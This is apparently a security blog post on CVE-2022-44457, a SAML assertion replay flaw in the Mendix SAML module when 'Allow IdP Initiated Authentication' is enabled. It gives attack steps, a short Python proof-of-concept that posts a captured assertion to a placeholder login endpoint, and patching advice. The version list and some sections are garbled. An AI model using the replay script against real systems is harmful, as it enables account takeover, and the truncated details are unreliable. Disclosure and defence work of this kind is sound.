CVE-2022-44457 - Exploiting Replay Attacks in Mendix SAML Module (All Versions < Patched) with 'Allow IdP Initiated Authentication' Enabled

In late 2022, a serious security flaw—CVE-2022-44457—was discovered in the Mendix SAML module, affecting many organizations using Mendix for enterprise app development. The vulnerability allows threat actors to replay captured SAML authentication packets against Mendix apps when the 'Allow IdP Initiated Authentication' non-default setting is enabled. This post will break down CVE-2022-44457 in simple terms, show you how it can be exploited, and explain how to determine if you're vulnerable. This CVE is particularly important as it describes an incomplete fix for an earlier CVE (CVE-2022-37011), and leaves a security hole if you have enabled a certain option that *is not* on by default.

What Is Affected?

A wide range of Mendix SAML module versions are affected, depending on which version of Mendix Studio Pro you use:

V3.3. - V3.3.3

> Note: You are only vulnerable *when* the SAML module option 'Allow Idp Initiated Authentication' is turned ON. This is not the default setting, but some administrators enable it for convenience or integration requirements.

Original References

- NVD - CVE-2022-44457
- Mendix Security Advisory
- Previous, related CVE-2022-37011

Background: SAML & IdP-Initiated Auth

SAML (Security Assertion Markup Language) is a standard for exchanging authentication data between parties—specifically, between an identity provider (IdP) and a service provider (SP). In *IdP-initiated* flows, the user starts authentication at the identity provider, which then sends an authentication "assertion" to Mendix.

'Allow IdP Initiated Authentication' is a convenience setting for direct login, but comes with security headaches. SAML assertions can be intercepted or replayed if not properly protected.

The Issue

Mendix SAML module did not sufficiently protect against the possibility that someone could capture a valid SAML assertion (packet), and then simply replay it later to gain access—effectively logging in as the victim. Fixes for CVE-2022-37011 existed, but only partially, and *did not* cover this special case when 'Allow IdP Initiated Authentication' was turned on.

Properly expire SAML assertions that arrived later via IdP-initiated logins

This means *even after logging out*, attackers could replay an old valid assertion and re-login as the original user.

Attack Pre-requisites

1. The attacker is able to capture network traffic between the victim and the IdP (e.g., same network, compromised wifi, or via phishing).

Steps to Attack

1. Capture a SAML Assertion: The attacker sniffs or logs the encrypted POST request sent from IdP to the Mendix app when a legitimate user logs in.
2. Replay the Assertion: Later, the attacker sends the same assertion POST data to the Mendix endpoint.
3. Unauthorized Access: Because the Mendix module does not check for duplicate assertions or for expired tokens (in the affected version with the setting enabled), the app processes the assertion as a valid login.

Visualization

                  ┌─────────┐
                  │  User   │
                  └─────────┘
                       │
              [Login to IdP]
                       │
       ┌────────────SAML----------┐
       │   (Attacker Sniffs)      │
       ▼                          ▼
┌─────────────┐           ┌─────────────┐
│   Identity  │  ---->    │   Mendix    │
│  Provider   │  SAML     │   App (SP)  │
└─────────────┘   Auth    └─────────────┘

Attacker later replays 
captured SAML assertion, 
bypassing user authentication.

Code Snippet: Simulating a Replay Attack

Below is a simple Python script (for educational purposes only!) showing how an attacker could replay a captured SAML assertion against a Mendix service:

import requests

# The URL your Mendix SAML module listens to
mendix_saml_endpoint = "https://target-mendix-app.com/sso/login";

# The POST data containing a captured SAML assertion
data = {
    'SAMLResponse': 'PASTE_CAPTURED_BASE64_SAML_ASSERTION_HERE'
}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

response = requests.post(mendix_saml_endpoint, data=data, headers=headers)

if "logged_in_as_user" in response.text:
    print("Exploit successful! Replayed SAML logged in the attacker.")
else:
    print("Failed to login (patched, or assertion expired).")

> Note: Real assertions are huge base64 strings. Sniffing them requires network access or browser dev tools.

Silent Attack: There may be no visible sign of the exploit, especially in large enterprise apps.

- Non-default Option: Not everyone is vulnerable, but many orgs enable this feature for legacy reasons.

Review SAML Config:

Open your SAML module's configuration. If 'Allow Idp Initiated Authentication' is turned on, you are at risk.

Are You Pre-Patched?

If your module version is within the vulnerable range, update immediately. Patches fully enforcing assertion expiration and uniqueness exist in later module versions.

Upgrade Immediately:

Download the latest version of the Mendix SAML module from the Mendix Marketplace.

Conclusion

CVE-2022-44457 demonstrates how even small configuration tweaks in security-sensitive modules can lead to major exposures—replaying authentication tokens is a classic example. While this attack only works with a non-default, *but commonly enabled*, option, you should patch immediately and review your settings if you use the Mendix SAML module.

Further Reading

- CVE-2022-44457 Summary - NVD
- SAML Security Best Practices
- Mendix Documentation - SAML


*This post written exclusively for educational awareness. Do not attack systems without explicit permission.*

Timeline

Published on: 11/08/2022 11:15:00 UTC
Last modified on: 12/13/2022 17:15:00 UTC